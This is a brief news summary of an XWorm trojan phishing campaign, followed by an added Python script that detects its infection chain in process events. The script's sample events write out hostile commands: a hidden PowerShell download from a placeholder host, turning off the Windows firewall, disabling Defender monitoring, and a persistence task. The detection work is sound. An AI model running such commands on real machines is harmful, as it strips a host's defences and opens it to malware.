2025-09-05

GBHackers News reports that the XWorm remote access trojan has become even stealthier in a recent attack campaign by using filenames that resemble those of legitimate applications.

According to a Trellix Advanced Research Center report, the attackers distribute phishing emails carrying a disguised .LNK shortcut; when opened, it launches malicious PowerShell commands that begin the multi-stage infection process.

The chain first drops a text file into the targeted system's temporary directory, then downloads 'discord.exe', which in turn deploys two malicious executables: the first disables Windows Firewall and the second contains XWorm.

XWorm terminates itself if it detects a virtualized environment. On other systems it uses PowerShell commands to evade Windows Defender and establishes persistence through a scheduled task named 'XClient'. It then executes a range of remotely issued commands, enabling distributed denial-of-service attacks, URL redirections, system shutdowns, and data collection for reconnaissance.
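As an added detection example, not code from GBHackers or the Trellix report: Python logic that scores constructed, Sysmon-like process events against the stages described above and alerts only when several stages appear on the same host. The event field names, the specific netsh and Set-MpPreference command lines and the download URL are assumptions; the report itself names only the firewall change, PowerShell-based Defender evasion and the 'XClient' task.

```python
"""Score hosts against the XWorm chain described above: PowerShell download
to %TEMP% -> firewall off -> Defender tampering -> 'XClient' scheduled task.
Event shape and command lines are constructed for illustration only."""
import re

# One rule per stage; field names ("host", "image", "cmdline") are hypothetical.
STAGE_RULES = {
    "powershell_download_to_temp": lambda e: e["image"] == "powershell.exe"
        and re.search(r"(iwr|invoke-webrequest|downloadfile|downloadstring)", e["cmdline"], re.I)
        and re.search(r"(%temp%|\$env:temp)", e["cmdline"], re.I),
    "firewall_disabled": lambda e: e["image"] == "netsh.exe"
        and re.search(r"advfirewall.*state\s+off", e["cmdline"], re.I),
    "defender_tampering": lambda e: e["image"] == "powershell.exe"
        and re.search(r"set-mppreference\s+-disable", e["cmdline"], re.I),
    "xclient_scheduled_task": lambda e: e["image"] == "schtasks.exe"
        and re.search(r'/create.*/tn\s+"?xclient"?', e["cmdline"], re.I),
}

def match_stages(events):
    """Map host -> set of stage names whose rule fired on that host."""
    stages = {}
    for e in events:
        for name, rule in STAGE_RULES.items():
            if rule(e):
                stages.setdefault(e["host"], set()).add(name)
    return stages

def chain_alerts(events, min_stages=3):
    """Hosts on which at least `min_stages` distinct stages were observed.
    Requiring several stages keeps a lone administrative netsh call quiet."""
    return sorted(h for h, s in match_stages(events).items() if len(s) >= min_stages)

# Constructed sample events; the download host is a placeholder, not an IoC.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": "powershell.exe",
     "cmdline": "powershell -w hidden iwr http://example.invalid/discord.exe -OutFile $env:TEMP\\discord.exe"},
    {"host": "WS01", "image": "netsh.exe",
     "cmdline": "netsh advfirewall set allprofiles state off"},
    {"host": "WS01", "image": "powershell.exe",
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "WS01", "image": "schtasks.exe",
     "cmdline": 'schtasks /create /tn "XClient" /sc onlogon /tr C:\\Users\\u\\AppData\\Roaming\\XClient.exe'},
    {"host": "WS02", "image": "netsh.exe",   # a single firewall change, no chain
     "cmdline": "netsh advfirewall set allprofiles state off"},
]

if __name__ == "__main__":
    print(chain_alerts(SAMPLE_EVENTS))  # ['WS01']
```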